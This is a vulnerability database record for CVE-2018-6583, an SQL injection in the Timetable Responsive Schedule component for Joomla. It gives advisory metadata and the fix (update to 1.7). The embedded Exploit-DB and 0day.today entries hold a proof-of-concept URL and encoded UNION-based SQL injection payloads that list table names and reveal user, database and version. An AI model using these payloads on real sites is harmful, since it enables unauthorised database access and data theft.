ID JVEL:561
Type joomla
Reporter velteam
Modified 2018-02-23T18:38:25
Description
Timetable Responsive Schedule For Joomla by QuanticaLabs, versions 1.6. and previous, SQL injection
Resolution: update to 1.7
update notice: https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates
{"id": "JVEL:561", "hash": "4cb698ba2e48aecc1453e8c216ce1817", "type": "joomla", "bulletinFamily": "software", "title": "Timetable Responsive Schedule, 1.6, SQL injection", "description": "Timetable Responsive Schedule For Joomla by QuanticaLabs, versions 1.6. and previous, SQL injection\n\nResolution: update to 1.7\n\nupdate notice: https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates\n", "published": "2018-02-23T00:00:00", "modified": "2018-02-23T18:38:25", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://vel.joomla.org/vel-blog/2087", "reporter": "velteam", "references": ["https://extensions.joomla.org/extension/timetable-responsive-schedule-for-joomla/", "https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates", "http://codecanyon.net/user/QuanticaLabs/portfolio?ref=QuanticaLabs"], "cvelist": ["CVE-2018-6583"], "lastseen": "2018-09-18T08:45:46", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-09-18T08:45:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-6583"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146460"]}, {"type": "exploitdb", "idList": ["EDB-ID:44130"]}, {"type": "zdt", "idList": ["1337DAY-ID-29838"]}], "modified": "2018-09-18T08:45:46"}, "vulnersScore": 6.6}, "objectVersion": "1.4", "affectedSoftware": [{"name": "COM_TIMETABLE", "version": "1.6", "operator": "eq"}, {"name": "COM_TIMETABLE", "version": "1.7", "operator": "lt"}], "_object_type": "robots.models.jvel.JVELBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.jvel.JVELBulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:20:28", "bulletinFamily": "NVD", "description": "SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&alias= request.", "modified": "2018-03-05T16:01:00", "id": "CVE-2018-6583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6583", "published": "2018-02-17T07:29:00", "title": "CVE-2018-6583", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-16T23:04:08", "bulletinFamily": "exploit", "description": "Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection. CVE-2018-6583. Webapps exploit for PHP platform. Tags: SQL Injection ...", "modified": "2018-02-16T00:00:00", "published": "2018-02-16T00:00:00", "id": "EDB-ID:44130", "href": "https://www.exploit-db.com/exploits/44130/", "type": "exploitdb", "title": "Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://quanticalabs.com/joomla/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/\r\n# Version: 1.5\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6583\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]\r\n# \r\n# LTYnKysvKiEwNzc3N1VOSU9OKi8oLyohMDc3NzdTRUxFQ1QqLzB4MjgzMTI5LCgvKiEwNzc3N1NFTEVDVCovKEB4KS8qITA3Nzc3RlJPTSovKC8qITA3Nzc3U0VMRUNUKi8oQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSlBTkQoMHgwMClJTihAeDo9Q09OQ0FUKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSwweDI4MzMyOSwweDI4MzQyOSktLSst\r\n# \r\n# JTJkJTM2JTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTI5JTJkJTJkJTIwJTJk\r\n# \t\r\n# # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44130/"}], "packetstorm": [{"lastseen": "2018-02-17T17:02:53", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://packetstormsecurity.com/files/146460/Joomla-Timetable-Responsive-Schedule-For-Joomla-1.5-SQL-Injection.html", "id": "PACKETSTORM:146460", "title": "Joomla! Timetable Responsive Schedule For Joomla 1.5 SQL Injection", "type": "packetstorm", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://quanticalabs.com/joomla/ \n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/ \n# Version: 1.5 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-6583 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL] \n# \n# # # # \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146460/joomlatimetablersfj15-sql.txt"}], "zdt": [{"lastseen": "2018-03-19T11:06:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://0day.today/exploit/description/29838", "id": "1337DAY-ID-29838", "type": "zdt", "title": "Joomla Timetable Responsive Schedule For Joomla 1.5 Component - alias SQL Injection Vulnerability", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection\r\n# Vendor Homepage: http://quanticalabs.com/joomla/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/\r\n# Version: 1.5\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6583\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]\r\n# \r\n# LTYnKysvKiEwNzc3N1VOSU9OKi8oLyohMDc3NzdTRUxFQ1QqLzB4MjgzMTI5LCgvKiEwNzc3N1NFTEVDVCovKEB4KS8qITA3Nzc3RlJPTSovKC8qITA3Nzc3U0VMRUNUKi8oQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSlBTkQoMHgwMClJTihAeDo9Q09OQ0FUKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSwweDI4MzMyOSwweDI4MzQyOSktLSst\r\n# \r\n# JTJkJTM2JTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTI5JTJkJTJkJTIwJTJk\r\n# \r\n# # # #\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29838", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}